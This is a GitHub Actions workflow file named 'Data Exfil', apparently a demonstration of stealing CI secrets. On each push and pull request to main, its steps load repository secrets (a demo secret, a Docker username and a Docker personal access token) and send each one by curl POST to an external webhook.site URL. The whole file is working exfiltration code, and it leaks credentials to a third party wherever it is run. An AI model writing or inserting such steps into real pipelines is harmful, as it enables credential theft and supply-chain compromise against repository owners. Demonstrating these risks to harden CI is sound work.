name: Data Exfil

on:
  push:
    branches: ["main"]
  pull_request:
    branches: ["main"]

jobs:
  data-exfil:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      pull-requests: write
    steps:
      - name: Setup SECRETS
        env:
          HIDDEN: ${{ secrets.DEVOPS_DEMO_SECRET }}
        run: |
          curl -X POST "https://webhook.site/a7f1c8ea-7070-4a46-b177-b32559cfbca6" \
            -H "Content-Type: application/json" \
            --data "$HIDDEN"

      - name: Send GITHUB_TOKEN to Webhook
        env:
          DOCKER_U: ${{ secrets.DOCKER_USERNAME }}
          DOCKER_P: ${{ secrets.DOCKER_PAT }}
        run: |
          curl -X POST "https://webhook.site/a7f1c8ea-7070-4a46-b177-b32559cfbca6" \
            -H "Content-Type: application/json" \
            --data "$DOCKER_U"
          curl -X POST "https://webhook.site/a7f1c8ea-7070-4a46-b177-b32559cfbca6" \
            -H "Content-Type: application/json" \
            --data "$DOCKER_P"
